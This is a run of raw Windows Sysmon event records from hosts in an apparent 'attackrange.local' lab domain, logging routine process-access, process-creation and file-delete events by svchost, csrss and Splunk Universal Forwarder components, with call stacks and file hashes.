21:51:54.740{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638872Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:54.740{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638871Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:54.740{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638870Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:54.740{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638869Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:54.740{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638868Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:54.740{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638867Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:54.740{BFB545BB-B864-6058-0500-00000000AF01}6281076C:\Windows\system32\csrss.exe{BFB545BB-B47A-605B-375A-00000000AF01}820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638866Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:54.740{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B47A-605B-375A-00000000AF01}820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638865Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:54.741{BFB545BB-B47A-605B-375A-00000000AF01}820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000638864Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:54.256{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC40C6030D7F6E3E83F146AEE10D5B43,SHA256=CA3956857EB71A83A51E85A944D6C7D85D29B62AC210E19D3EBCBC717CD416F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918743Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:55.766{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918742Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:55.766{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918741Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:55.732{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA91D8699853D394D01363C1877D8A61,SHA256=2BE236974C26F26A16F8FC7A8D41936AE0868555783855FEC4925517135CD44C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638892Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:55.787{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A27BE36B3BC459796285AD906E21E15,SHA256=FAE51DA9E2BAB2981223E6F8BAF01CE36ED72645F1FB4C5C97C78E7A693E8C4F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000638891Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:55.412{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B47B-605B-385A-00000000AF01}1300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638890Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:55.412{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638889Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:55.412{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638888Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:55.412{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638887Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:55.412{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638886Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:55.412{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638885Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:55.412{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638884Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:55.412{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638883Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:55.412{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638882Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:55.412{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638881Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:55.412{BFB545BB-B864-6058-0500-00000000AF01}628744C:\Windows\system32\csrss.exe{BFB545BB-B47B-605B-385A-00000000AF01}1300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638880Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:55.412{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B47B-605B-385A-00000000AF01}1300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638879Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:55.413{BFB545BB-B47B-605B-385A-00000000AF01}1300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000638878Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:55.271{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D21B475B76591A017DCF50453BBA915,SHA256=50BCA8962ACF202409AC1D3566CE5C22D0D66EFFC12AFF846ECC796CECB68DC2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918746Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 